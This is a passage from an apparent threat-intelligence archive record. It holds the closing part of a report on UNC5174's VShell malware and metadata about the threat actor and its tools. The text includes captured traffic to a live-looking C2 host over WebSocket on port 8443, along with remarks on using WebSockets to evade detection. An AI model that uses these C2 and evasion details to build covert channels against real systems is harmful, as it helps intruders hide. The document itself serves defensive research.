Switching Protocols..Upgrade: websoc\n12871 16:09:05.345517369 1 4 (12202.12213) \u003c write res=163 data=GET /w HTTP/1.1..Host: vs.gooogleasia.com:8443.. \n12939 16:09:05.536259167 0 4 (12202.12202) \u003c read res=129 data=HTTP/1.1 101 Switching Protocols..Upgrade: websoc\nThe choice of WebSockets for C2 is not new, but it is not a typical choice for malware either. Over the years, there\nhave been a few reports documenting malware that uses WebSockets for C2 communications, such as\nPY#RATION. WebSocket C2s are more tedious for attackers to configure compared with standard methods, and\nthey typically run on port 80 or 443.\nIn this case, the attackers have configured VShell to run on the HTTPS port (8443). This is significant because\nHTTPS traffic is encrypted. 
Our runtime capture confirms that, except for a few random words, we found nothing\nof note in the network traffic once the connection was upgraded to a WebSocket.\nGiven that the infected hosts are managed through a UI (as shown below), it is likely that UNC5174 prefers\nWebSockets because the payloads can be sent to the compromised machine in real-time and over encrypted traffic.\nThere have been a few reports over the years of antivirus solutions missing malware C2 communication over\nWebSockets, so it is also possible that the threat actor is trying to use a less common C2 channel for defense\nevasion purposes.\n",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/"
	],
	"report_names": [
		"unc5174-chinese-threat-actor-vshell"
	],
	"threat_actors": [
		{
			"id": "b302cfdb-30c9-4dce-a968-d2398dda820d",
			"created_at": "2024-03-28T02:00:05.789775Z",
			"updated_at": "2026-04-10T02:00:03.611467Z",
			"deleted_at": null,
			"main_name": "UNC5174",
			"aliases": [
				"Uteus"
			],
			"source_name": "MISPGALAXY:UNC5174",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8bcbeb8a-111b-4ea1-a72b-5c7abd8ef132",
			"created_at": "2025-11-01T02:04:53.050049Z",
			"updated_at": "2026-04-10T02:00:03.774442Z",
			"deleted_at": null,
			"main_name": "BRONZE SNOWDROP",
			"aliases": [
				"UNC5174 "
			],
			"source_name": "Secureworks:BRONZE SNOWDROP",
			"tools": [
				"Metasploit",
				"SNOWLIGHT",
				"SUPERSHELL",
				"Sliver",
				"VShell"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775438946,
	"ts_updated_at": 1775792067,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4f8f9491935097347510437ef3e902047de95b01.pdf",
		"text": "https://archive.orkl.eu/4f8f9491935097347510437ef3e902047de95b01.txt",
		"img": "https://archive.orkl.eu/4f8f9491935097347510437ef3e902047de95b01.jpg"
	}
}